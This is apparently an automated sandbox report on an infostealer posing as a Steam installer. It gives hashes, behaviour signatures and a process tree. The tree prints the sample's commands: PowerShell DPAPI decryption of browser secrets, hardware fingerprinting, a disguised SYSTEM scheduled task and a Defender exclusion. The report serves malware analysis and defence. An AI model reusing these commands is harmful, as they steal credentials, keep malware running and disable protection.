Analysis
max time kernel: 4s
max time network: 10s
platform: windows11-21h2_x64
resource: win11-20240221-en
resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 07-04-2024 19:44
Static task: static1
Behavioral tasks (task: sample, resource):
behavioral1: Steam_6n0hahx7.exe, win11-20240221-en
behavioral2: $PLUGINSDIR/StdUtils.dll, win11-20240221-en
behavioral3: $PLUGINSDIR/System.dll, win11-20240221-en
behavioral4: LICENSES.chromium.html, win11-20240221-en
behavioral5: Steam.exe, win11-20240221-en
behavioral6: d3dcompiler_47.dll, win11-20240221-en
behavioral7: ffmpeg.dll, win11-20240221-en
behavioral8: libEGL.dll, win11-20240214-en
behavioral9: libGLESv2.dll, win11-20240221-en
behavioral10: resources/elevate.exe, win11-20240221-en
behavioral11: vk_swiftshader.dll, win11-20240221-en
behavioral12: vulkan-1.dll, win11-20240221-en
behavioral13: $PLUGINSDIR/nsis7z.dll, win11-20240221-en
General
Target: Steam.exe
Size: 154.5MB
MD5: 8a3861c725d108eb0c1a17fa43f0487a
SHA1: e4b713028e43e0f99e4568aa3902384b52951ed2
SHA256: 0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef
SHA512: db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad
SSDEEP: 1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi
Malware Config
Signatures
Loads dropped DLL (1 IoC)
  Process: Steam.exe (PID 4576)
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow 2: api.ipify.org
An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  Processes: cmd.exe (PID 3524), cmd.exe (PID 3156)
Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates processes with tasklist (1 TTP, 2 IoCs)
  Processes: tasklist.exe (PID 648), tasklist.exe (PID 4528)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token SeDebugPrivilege: tasklist.exe (PID 648)
  Token SeDebugPrivilege: tasklist.exe (PID 4528)
Suspicious use of WriteProcessMemory (16 IoCs)
  Source process wrote to memory of target process (each pair is recorded twice in the report):
  Steam.exe (PID 4576) wrote to memory of cmd.exe (PID 4896)
  Steam.exe (PID 4576) wrote to memory of cmd.exe (PID 344)
  cmd.exe (PID 344) wrote to memory of tasklist.exe (PID 648)
  cmd.exe (PID 4896) wrote to memory of curl.exe (PID 852)
  Steam.exe (PID 4576) wrote to memory of cmd.exe (PID 4760)
  Steam.exe (PID 4576) wrote to memory of cmd.exe (PID 3524)
  cmd.exe (PID 4760) wrote to memory of tasklist.exe (PID 4528)
  cmd.exe (PID 3524) wrote to memory of powershell.exe (PID 2488)
Processes
(The leading number is the depth in the process tree; each entry lists the image, its PID, the command line, and the signatures it triggered.)

1. C:\Users\Admin\AppData\Local\Temp\Steam.exe (PID 4576)
   command: "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
   signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe (PID 4896)
      command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\curl.exe (PID 852)
         command: curl http://api.ipify.org/ --ssl-no-revoke

   2. C:\Windows\system32\cmd.exe (PID 344)
      command: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\tasklist.exe (PID 648)
         command: tasklist
         signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken

   2. C:\Windows\system32\cmd.exe (PID 4760)
      command: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\tasklist.exe (PID 4528)
         command: tasklist
         signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken

   2. C:\Windows\system32\cmd.exe (PID 3524)
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
      signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2488)
         command: the same powershell.exe Add-Type ... Unprotect(...) command line as its parent (PID 3524), without the cmd.exe /d /s /c wrapper

   2. C:\Windows\system32\cmd.exe (PID 3156)
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"
      signatures: An obfuscated cmd.exe command-line is typically used to evade detection.
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4852)
         command: the same powershell.exe Add-Type ... Unprotect(...) command line as its parent (PID 3156), without the cmd.exe /d /s /c wrapper

   2. C:\Windows\system32\cmd.exe (PID 4816)
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      3. C:\Windows\System32\Wbem\WMIC.exe (PID 2868)
         command: wmic diskdrive get serialnumber

   2. C:\Windows\system32\cmd.exe (PID 2504)
      command: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      3. C:\Windows\system32\reg.exe (PID 5040)
         command: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

   2. C:\Windows\system32\cmd.exe (PID 1008)
      command: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      3. C:\Windows\system32\schtasks.exe (PID 3120)
         command: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
         signatures: Creates scheduled task(s)

   2. C:\Users\Admin\AppData\Local\Temp\Steam.exe (PID 1828)
      command: "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

   2. C:\Windows\system32\cmd.exe (PID 3080)
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      3. C:\Windows\System32\Wbem\WMIC.exe (PID 2188)
         command: wmic bios get smbiosbiosversion

   2. C:\Users\Admin\AppData\Local\Temp\Steam.exe (PID 2736)
      command: "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

   2. C:\Windows\system32\cmd.exe (PID 3728)
      command: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
      3. C:\Windows\system32\cscript.exe (PID 3088)
         command: cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
         4. C:\Windows\system32\cmd.exe (PID 2252)
            command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
            5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1412)
               command: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

   2. C:\Windows\system32\cmd.exe (PID 1516)
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      3. C:\Windows\System32\Wbem\WMIC.exe (PID 4176)
         command: wmic baseboard get serialnumber

   2. C:\Windows\system32\cmd.exe (PID 664)
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      3. C:\Windows\System32\Wbem\WMIC.exe (PID 1228)
         command: wmic MemoryChip get /format:list
      3. C:\Windows\system32\find.exe (PID 4668)
         command: find /i "Speed"

   2. C:\Windows\system32\cmd.exe (PID 2044)
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      3. C:\Windows\System32\Wbem\WMIC.exe (PID 1872)
         command: wmic path win32_computersystemproduct get uuid

   2. C:\Windows\system32\cmd.exe (PID 1232)
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4796)
         command: powershell wininit.exe
         4. C:\Windows\system32\wininit.exe (PID 3116)
            command: "C:\Windows\system32\wininit.exe"
Network
MITRE ATT&CK Enterprise v15
Downloads